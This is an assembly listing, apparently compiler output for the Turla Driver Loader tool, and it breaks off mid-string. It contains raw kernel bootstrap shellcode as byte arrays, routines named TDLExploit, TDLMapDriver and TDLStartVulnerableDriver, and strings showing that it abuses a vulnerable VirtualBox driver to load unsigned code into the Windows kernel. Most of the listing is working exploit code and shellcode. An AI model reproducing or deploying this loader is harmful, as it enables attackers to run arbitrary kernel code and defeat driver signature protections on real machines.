; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0 include listing.inc INCLUDELIB LIBCMT INCLUDELIB OLDNAMES PUBLIC TDLBootstrapLoader_code PUBLIC g_lApplicationInstances PUBLIC g_hVBox PUBLIC g_VBoxInstalled PUBLIC g_NtBuildNumber _DATA SEGMENT COMM g_hInstance:QWORD _DATA ENDS _BSS SEGMENT g_VBoxInstalled DD 01H DUP (?) g_NtBuildNumber DD 01H DUP (?) _BSS ENDS _DATA SEGMENT g_hVBox DQ ffffffffffffffffH _DATA ENDS shrd SEGMENT g_lApplicationInstances DD 00H shrd ENDS CONST SEGMENT TDLBootstrapLoader_code DB 048H DB 08bH DB 0c4H DB 041H DB 054H DB 048H DB 081H DB 0ecH DB 090H DB 00H DB 00H DB 00H DB 048H DB 089H DB 058H DB 010H DB 04dH DB 08bH DB 0e0H DB 048H DB 089H DB 068H DB 018H DB 048H DB 08dH DB 01dH DB 0e2H DB 0ffH DB 0ffH DB 0ffH DB 04cH DB 089H DB 068H DB 0e8H DB 048H DB 081H DB 0c3H DB 00H DB 03H DB 00H DB 00H DB 04cH DB 089H DB 070H DB 0e0H DB 04cH DB 08bH DB 0eaH DB 04cH DB 089H DB 078H DB 0d8H DB 04cH DB 08bH DB 0c9H DB 033H DB 0c9H DB 041H DB 0b8H DB 054H DB 064H DB 06cH DB 053H DB 04cH DB 063H DB 073H DB 03cH DB 04cH DB 03H DB 0f3H DB 045H DB 08bH DB 07eH DB 050H DB 041H DB 08dH DB 097H DB 00H DB 010H DB 00H DB 00H DB 041H DB 0ffH DB 0d1H DB 045H DB 033H DB 0c9H DB 048H DB 08dH DB 0a8H DB 00H DB 010H DB 00H DB 00H DB 048H DB 081H DB 0e5H DB 00H DB 0f0H DB 0ffH DB 0ffH DB 041H DB 083H DB 0beH DB 084H DB 00H DB 00H DB 00H DB 05H DB 0fH DB 086H DB 0b0H DB 00H DB 00H DB 00H DB 041H DB 08bH DB 08eH DB 0b0H DB 00H DB 00H DB 00H DB 085H DB 0c9H DB 0fH DB 084H DB 0a1H DB 00H DB 00H DB 00H DB 048H DB 089H DB 0b4H DB 024H DB 0b8H DB 00H DB 00H DB 00H DB 04cH DB 08dH DB 04H DB 0bH DB 041H DB 08bH DB 0b6H DB 0b4H DB 00H DB 00H DB 00H DB 04cH DB 08bH DB 0ddH DB 04dH DB 02bH DB 05eH DB 030H DB 048H DB 089H DB 0bcH DB 024H DB 088H DB 00H DB 00H DB 00H DB 041H DB 08bH DB 0f9H DB 085H DB 0f6H DB 074H DB 068H DB 0fH DB 01fH DB 044H DB 00H DB 00H DB 041H DB 0b9H DB 08H DB 00H DB 00H DB 00H DB 04dH DB 08dH DB 050H DB 08H DB 045H DB 039H DB 048H DB 04H DB 076H DB 043H DB 041H DB 0fH DB 0b7H DB 02H DB 08bH DB 0c8H DB 0c1H DB 0e9H DB 0cH DB 083H DB 0f9H DB 03H DB 074H DB 017H DB 083H DB 0f9H DB 0aH DB 075H DB 022H DB 041H DB 08bH DB 010H DB 025H DB 0ffH DB 0fH DB 00H DB 00H DB 048H DB 08dH DB 0cH DB 03H DB 04cH DB 01H DB 01cH DB 0aH DB 0ebH DB 010H DB 041H DB 08bH DB 010H DB 025H DB 0ffH DB 0fH DB 00H DB 00H DB 048H DB 08dH DB 0cH DB 03H DB 044H DB 01H DB 01cH DB 0aH DB 049H DB 083H DB 0c2H DB 02H DB 041H DB 083H DB 0c1H DB 02H DB 045H DB 03bH DB 048H DB 04H DB 072H DB 0bdH DB 041H DB 08bH DB 040H DB 04H DB 03H DB 0f8H DB 04cH DB 03H DB 0c0H DB 03bH DB 0feH DB 072H DB 0a0H DB 045H DB 033H DB 0c9H DB 048H DB 08bH DB 0b4H DB 024H DB 0b8H DB 00H DB 00H DB 00H DB 048H DB 08bH DB 0bcH DB 024H DB 088H DB 00H DB 00H DB 00H DB 049H DB 08bH DB 0d7H DB 04cH DB 08bH DB 07cH DB 024H DB 070H DB 048H DB 0c1H DB 0eaH DB 03H DB 048H DB 085H DB 0d2H DB 074H DB 01dH DB 048H DB 08bH DB 0cdH DB 048H DB 02bH DB 0ddH DB 066H DB 0fH DB 01fH DB 044H DB 00H DB 00H DB 048H DB 08bH DB 04H DB 0bH DB 048H DB 089H DB 01H DB 048H DB 08dH DB 049H DB 08H DB 048H DB 083H DB 0eaH DB 01H DB 075H DB 0efH DB 04cH DB 089H DB 04cH DB 024H DB 030H DB 04cH DB 08dH DB 044H DB 024H DB 040H DB 04cH DB 089H DB 08cH DB 024H DB 0a0H DB 00H DB 00H DB 00H DB 048H DB 08dH DB 08cH DB 024H DB 0a0H DB 00H DB 00H DB 00H DB 04cH DB 089H DB 04cH DB 024H DB 048H DB 0fH DB 057H DB 0c0H DB 04cH DB 089H DB 04cH DB 024H DB 050H DB 0baH DB 0ffH DB 0ffH DB 01fH DB 00H DB 0f3H DB 0fH DB 07fH DB 044H DB 024H DB 060H DB 0c7H DB 044H DB 024H DB 040H DB 030H DB 00H DB 00H DB 00H DB 0c7H DB 044H DB 024H DB 058H DB 00H DB 02H DB 00H DB 00H DB 041H DB 08bH DB 046H DB 028H DB 048H DB 03H DB 0c5H DB 048H DB 089H DB 044H DB 024H DB 028H DB 04cH DB 089H DB 04cH DB 024H DB 020H DB 045H DB 033H DB 0c9H DB 041H DB 0ffH DB 0d5H DB 04cH DB 08bH DB 074H DB 024H DB 078H DB 04cH DB 08bH DB 0acH DB 024H DB 080H DB 00H DB 00H DB 00H DB 048H DB 08bH DB 0acH DB 024H DB 0b0H DB 00H DB 00H DB 00H DB 048H DB 08bH DB 09cH DB 024H DB 0a8H DB 00H DB 00H DB 00H DB 085H DB 0c0H DB 078H DB 0bH DB 048H DB 08bH DB 08cH DB 024H DB 0a0H DB 00H DB 00H DB 00H DB 041H DB 0ffH DB 0d4H DB 048H DB 081H DB 0c4H DB 090H DB 00H DB 00H DB 00H DB 041H DB 05cH DB 0c3H TDLBootstrapLoader_code_w10rs2 DB 040H DB 053H DB 055H DB 056H DB 048H DB 083H DB 0ecH DB 020H DB 04cH DB 08bH DB 0c9H DB 04cH DB 089H DB 07cH DB 024H DB 050H DB 048H DB 08dH DB 01dH DB 0e9H DB 0ffH DB 0ffH DB 0ffH DB 033H DB 0c9H DB 048H DB 081H DB 0c3H DB 00H DB 03H DB 00H DB 00H DB 041H DB 0b8H DB 054H DB 064H DB 06cH DB 053H DB 048H DB 063H DB 06bH DB 03cH DB 048H DB 03H DB 0ebH DB 044H DB 08bH DB 07dH DB 050H DB 041H DB 08dH DB 097H DB 00H DB 010H DB 00H DB 00H DB 041H DB 0ffH DB 0d1H DB 048H DB 08dH DB 0b0H DB 00H DB 010H DB 00H DB 00H DB 048H DB 081H DB 0e6H DB 00H DB 0f0H DB 0ffH DB 0ffH DB 083H DB 0bdH DB 084H DB 00H DB 00H DB 00H DB 05H DB 0fH DB 086H DB 0a5H DB 00H DB 00H DB 00H DB 08bH DB 08dH DB 0b0H DB 00H DB 00H DB 00H DB 085H DB 0c9H DB 0fH DB 084H DB 097H DB 00H DB 00H DB 00H DB 048H DB 089H DB 07cH DB 024H DB 040H DB 04cH DB 08dH DB 04H DB 0bH DB 04cH DB 08bH DB 0deH DB 04cH DB 089H DB 074H DB 024H DB 048H DB 04cH DB 02bH DB 05dH DB 030H DB 033H DB 0ffH DB 044H DB 08bH DB 0b5H DB 0b4H DB 00H DB 00H DB 00H DB 045H DB 085H DB 0f6H DB 074H DB 06aH DB 066H DB 0fH DB 01fH DB 084H DB 00H DB 00H DB 00H DB 00H DB 00H DB 041H DB 0b9H DB 08H DB 00H DB 00H DB 00H DB 04dH DB 08dH DB 050H DB 08H DB 045H DB 039H DB 048H DB 04H DB 076H DB 043H DB 041H DB 0fH DB 0b7H DB 02H DB 08bH DB 0c8H DB 0c1H DB 0e9H DB 0cH DB 083H DB 0f9H DB 03H DB 074H DB 017H DB 083H DB 0f9H DB 0aH DB 075H DB 022H DB 041H DB 08bH DB 010H DB 025H DB 0ffH DB 0fH DB 00H DB 00H DB 048H DB 08dH DB 0cH DB 03H DB 04cH DB 01H DB 01cH DB 0aH DB 0ebH DB 010H DB 041H DB 08bH DB 010H DB 025H DB 0ffH DB 0fH DB 00H DB 00H DB 048H DB 08dH DB 0cH DB 03H DB 044H DB 01H DB 01cH DB 0aH DB 049H DB 083H DB 0c2H DB 02H DB 041H DB 083H DB 0c1H DB 02H DB 045H DB 03bH DB 048H DB 04H DB 072H DB 0bdH DB 041H DB 08bH DB 040H DB 04H DB 03H DB 0f8H DB 04cH DB 03H DB 0c0H DB 041H DB 03bH DB 0feH DB 072H DB 09fH DB 048H DB 08bH DB 07cH DB 024H DB 040H DB 04cH DB 08bH DB 074H DB 024H DB 048H DB 049H DB 08bH DB 0d7H DB 04cH DB 08bH DB 07cH DB 024H DB 050H DB 048H DB 0c1H DB 0eaH DB 03H DB 048H DB 085H DB 0d2H DB 074H DB 025H DB 048H DB 08bH DB 0ceH DB 048H DB 02bH DB 0deH DB 0fH DB 01fH DB 040H DB 00H DB 066H DB 066H DB 0fH DB 01fH DB 084H DB 00H DB 00H DB 00H DB 00H DB 00H DB 048H DB 08bH DB 04H DB 0bH DB 048H DB 089H DB 01H DB 048H DB 08dH DB 049H DB 08H DB 048H DB 083H DB 0eaH DB 01H DB 075H DB 0efH DB 08bH DB 045H DB 028H DB 048H DB 03H DB 0c6H DB 048H DB 083H DB 0c4H DB 020H DB 05eH DB 05dH DB 05bH DB 048H DB 0ffH DB 0e0H CONST ENDS PUBLIC TDLVBoxInstalled PUBLIC TDLGetProcAddress PUBLIC TDLResolveKernelImport PUBLIC TDLExploit PUBLIC TDLMapDriver PUBLIC TDLStartVulnerableDriver PUBLIC TDLStopVulnerableDriver PUBLIC TDLProcessCommandLine PUBLIC TDLMain PUBLIC ??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ ; `string' PUBLIC ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ ; `string' PUBLIC ??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_08EFILHJLF@furutaka@ ; `string' PUBLIC ??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ ; `string' PUBLIC ??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ ; `string' PUBLIC ??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ ; `string' PUBLIC ??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ ; `string' PUBLIC ??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string' PUBLIC ??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ ; `string' PUBLIC ??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ ; `string' PUBLIC ??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ ; `string' PUBLIC ??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string' PUBLIC ??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ ; `string' PUBLIC ??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ ; `string' PUBLIC ??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ ; `string' PUBLIC ??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ ; `string' PUBLIC ??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ ; `string' PUBLIC ??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ ; `string' PUBLIC ??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ ; `string' PUBLIC ??_C@_07IPICGNAN@ZwClose@ ; `string' PUBLIC ??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ ; `string' PUBLIC ??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ ; `string' PUBLIC ??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ ; `string' PUBLIC ??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ ; `string' PUBLIC ??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ ; `string' PUBLIC ??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ ; `string' PUBLIC ??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ ; `string' PUBLIC ??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ ; `string' PUBLIC ??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ ; `string' PUBLIC ??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ ; `string' PUBLIC ??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ ; `string' PUBLIC ??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ ; `string' PUBLIC ??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ ; `string' PUBLIC ??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ ; `string' PUBLIC ??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string' PUBLIC ??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ ; `string' PUBLIC ??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string' PUBLIC ??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ ; `string' PUBLIC ??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string' PUBLIC ??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string' PUBLIC ??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string' PUBLIC ??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ ; `string' PUBLIC ??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ ; `string' PUBLIC ??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ ; `string' PUBLIC ??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string' PUBLIC ??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ ; `string' PUBLIC ??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string' PUBLIC ??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ ; `string' PUBLIC ??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ ; `string' PUBLIC ??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string' PUBLIC ??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ ; `string' PUBLIC ??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ ; `string' PUBLIC ??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ ; `string' PUBLIC ??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ ; `string' PUBLIC ??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ ; `string' PUBLIC ??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ ; `string' PUBLIC ??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ ; `string' PUBLIC ??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ ; `string' PUBLIC ??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@ ; `string' PUBLIC ??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@ ; `string' PUBLIC ??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ ; `string' PUBLIC ??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ ; `string' PUBLIC ??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@ ; `string' PUBLIC ??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@ ; `string' PUBLIC ??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@ ; `string' PUBLIC ??_C@_13JOFGPIOO@?$AA?4@ ; `string' PUBLIC ??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@ ; `string' PUBLIC ??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@ ; `string' EXTRN __imp_GetCommandLineW:PROC EXTRN __imp_GetFileAttributesW:PROC EXTRN __imp_CloseHandle:PROC EXTRN __imp_DeviceIoControl:PROC EXTRN __imp_Sleep:PROC EXTRN __imp_ExitProcess:PROC EXTRN __imp_GetSystemDirectoryW:PROC EXTRN __imp_GetModuleHandleW:PROC EXTRN __imp_SetConsoleTitleW:PROC EXTRN __imp_RegCloseKey:PROC EXTRN __imp_RegOpenKeyExW:PROC EXTRN __imp_CloseServiceHandle:PROC EXTRN __imp_OpenSCManagerW:PROC EXTRN __imp_LdrGetProcedureAddress:PROC EXTRN __imp_LdrLoadDll:PROC EXTRN __imp_RtlInitString:PROC EXTRN __imp_RtlInitUnicodeString:PROC EXTRN __imp_RtlGetVersion:PROC EXTRN __imp_RtlImageNtHeader:PROC EXTRN __imp_NtDeleteFile:PROC EXTRN __imp_NtAllocateVirtualMemory:PROC EXTRN __imp_NtFreeVirtualMemory:PROC EXTRN _strend_w:PROC EXTRN _strcpy_w:PROC EXTRN _strcat_w:PROC EXTRN ultostr_w:PROC EXTRN ultohex_w:PROC EXTRN u64tohex_w:PROC EXTRN GetCommandLineParamW:PROC EXTRN supGetNtOsBase:PROC EXTRN supQueryResourceData:PROC EXTRN supBackupVBoxDrv:PROC EXTRN supWriteBufferToFile:PROC EXTRN supIsObjectExists:PROC EXTRN supStopVBoxService:PROC EXTRN cuiInitialize:PROC EXTRN cuiPrintTextW:PROC EXTRN scmInstallDriver:PROC EXTRN scmStartDriver:PROC EXTRN scmOpenDevice:PROC EXTRN scmStopDriver:PROC EXTRN scmRemoveDriver:PROC EXTRN memcpy:PROC ; COMDAT pdata pdata SEGMENT $pdata$RtlSecureZeroMemory DD imagerel $LN4 DD imagerel $LN4+27 DD imagerel $unwind$RtlSecureZeroMemory pdata ENDS ; COMDAT pdata pdata SEGMENT $pdata$TDLVBoxInstalled DD imagerel $LN5 DD imagerel $LN5+83 DD imagerel $unwind$TDLVBoxInstalled pdata ENDS ; COMDAT pdata pdata SEGMENT $pdata$TDLGetProcAddress DD imagerel $LN5 DD imagerel $LN5+88 DD imagerel $unwind$TDLGetProcAddress pdata ENDS ; COMDAT pdata pdata SEGMENT $pdata$TDLResolveKernelImport DD imagerel $LN19 DD imagerel $LN19+167 DD imagerel $unwind$TDLResolveKernelImport pdata ENDS ; COMDAT pdata pdata SEGMENT $pdata$TDLExploit DD imagerel $LN26 DD imagerel $LN26+1256 DD imagerel $unwind$TDLExploit pdata ENDS ; COMDAT pdata pdata SEGMENT $pdata$TDLMapDriver DD imagerel $LN35 DD imagerel $LN35+1671 DD imagerel $unwind$TDLMapDriver pdata ENDS ; COMDAT pdata pdata SEGMENT $pdata$TDLStartVulnerableDriver DD imagerel $LN28 DD imagerel $LN28+590 DD imagerel $unwind$TDLStartVulnerableDriver pdata ENDS ; COMDAT pdata pdata SEGMENT $pdata$TDLStopVulnerableDriver DD imagerel $LN16 DD imagerel $LN16+353 DD imagerel $unwind$TDLStopVulnerableDriver pdata ENDS ; COMDAT pdata pdata SEGMENT $pdata$TDLProcessCommandLine DD imagerel $LN11 DD imagerel $LN11+177 DD imagerel $unwind$TDLProcessCommandLine pdata ENDS ; COMDAT pdata pdata SEGMENT $pdata$TDLMain DD imagerel $LN14 DD imagerel $LN14+361 DD imagerel $unwind$TDLMain pdata ENDS ; COMDAT ??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@ CONST SEGMENT ??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@ DB 'L' DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'e', 00H DB 't', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' ' DB 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H DB 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, ' ', 00H, 's', 00H, 'o' DB 00H, 'f', 00H, 't', 00H, 'w', 00H, 'a', 00H, 'r', 00H, 'e', 00H DB ' ', 00H, 'i', 00H, 'n', 00H, 's', 00H, 't', 00H, 'a', 00H, 'l' DB 00H, 'l', 00H, 'a', 00H, 't', 00H, 'i', 00H, 'o', 00H, 'n', 00H DB ',', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e' DB 00H, 'r', 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k', 